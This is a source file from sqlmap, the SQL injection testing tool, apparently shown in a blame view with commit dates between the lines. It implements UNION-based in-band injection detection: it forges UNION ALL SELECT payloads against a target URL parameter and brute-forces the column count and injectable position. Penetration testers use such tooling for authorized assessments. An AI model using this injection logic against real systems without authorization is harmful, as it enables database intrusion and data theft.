sqlmap/lib/techniques/inband/union/test.py

139 lines
5.3 KiB
Python
Raw Normal View History

2008-10-15 19:38:22 +04:00
#!/usr/bin/env python
"""
2008-10-15 19:56:32 +04:00
$Id$
2008-10-15 19:38:22 +04:00
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
2010-10-15 03:18:29 +04:00
See the file 'doc/COPYING' for copying permission
2008-10-15 19:38:22 +04:00
"""
2011-01-06 12:26:01 +03:00
import time
2008-10-15 19:38:22 +04:00
from lib.core.agent import agent
2011-01-06 12:26:01 +03:00
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import getIdentifiedDBMS
from lib.core.common import getUnicode
from lib.core.common import parseUnionPage
from lib.core.common import randomStr
2008-10-15 19:38:22 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
2010-12-08 16:09:27 +03:00
from lib.core.enums import PAYLOAD
2011-01-15 18:14:22 +03:00
from lib.core.settings import INBAND_FROM_TABLE
from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser
2008-10-15 19:38:22 +04:00
from lib.request.connect import Connect as Request
2011-01-16 04:17:09 +03:00
def __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=1):
validPayload = None
vector = None
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target url is
# affected by an exploitable inband SQL injection vulnerability
for position in range(0, count):
# Prepare expression with delimiters
randQuery = randomStr()
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
2011-01-16 04:17:09 +03:00
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
# Forge the inband SQL injection request
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
resultPage, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
if resultPage and randQuery in resultPage and " UNION ALL SELECT " not in resultPage:
validPayload = payload
vector = (position, count, comment, prefix, suffix, conf.uChar, where)
if where == 1:
# Prepare expression with delimiters
randQuery2 = randomStr()
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
2011-01-16 04:17:09 +03:00
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
# Confirm that it is a full inband SQL injection
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=2)
# Perform the request
resultPage, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
if resultPage and " UNION ALL SELECT " not in resultPage and ((randQuery in resultPage and randQuery2 not in resultPage) or (randQuery not in resultPage and randQuery2 in resultPage)):
vector = (position, count, comment, prefix, suffix, conf.uChar, 2)
break
return validPayload, vector
2011-01-16 04:17:09 +03:00
def __unionConfirm(comment, place, parameter, value, prefix, suffix, count):
validPayload = None
vector = None
# Confirm the inband SQL injection and get the exact column
# position which can be used to extract data
2011-01-16 04:17:09 +03:00
validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count)
# Assure that the above function found the exploitable full inband
# SQL injection position
if not validPayload:
2011-01-16 04:17:09 +03:00
validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=2)
return validPayload, vector
2011-01-16 04:17:09 +03:00
def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
2008-10-15 19:38:22 +04:00
"""
This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 50 columns
on the target database table
"""
validPayload = None
vector = None
query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)
2008-10-15 19:38:22 +04:00
for count in range(conf.uColsStart, conf.uColsStop+1):
2011-01-15 18:14:22 +03:00
if getIdentifiedDBMS() in INBAND_FROM_TABLE and query.endswith(INBAND_FROM_TABLE[getIdentifiedDBMS()]):
query = query[:-len(INBAND_FROM_TABLE[getIdentifiedDBMS()])]
2008-10-15 19:38:22 +04:00
if count:
query += ", %s" % conf.uChar
2008-10-15 19:38:22 +04:00
2011-01-15 18:14:22 +03:00
if getIdentifiedDBMS() in INBAND_FROM_TABLE:
query += INBAND_FROM_TABLE[getIdentifiedDBMS()]
2008-10-15 19:38:22 +04:00
2011-01-16 03:15:30 +03:00
status = "%d/%d" % (count, conf.uColsStop)
debugMsg = "testing %s columns (%d%%)" % (status, round(100.0*count/conf.uColsStop))
logger.debug(debugMsg)
2011-01-16 04:17:09 +03:00
validPayload, vector = __unionConfirm(comment, place, parameter, value, prefix, suffix, count)
if validPayload:
break
2008-10-15 19:38:22 +04:00
2011-01-06 12:26:01 +03:00
clearConsoleLine(True)
return validPayload, vector
2008-10-15 19:38:22 +04:00
2011-01-16 04:17:09 +03:00
def unionTest(comment, place, parameter, value, prefix, suffix):
2008-10-15 19:38:22 +04:00
"""
This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 3*50 times
"""
if conf.direct:
return
2010-12-08 16:09:27 +03:00
kb.technique = PAYLOAD.TECHNIQUE.UNION
2011-01-16 04:17:09 +03:00
validPayload, vector = __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
2008-10-15 19:38:22 +04:00
if validPayload:
validPayload = agent.removePayloadDelimiters(validPayload, False)
2008-10-15 19:38:22 +04:00
return validPayload, vector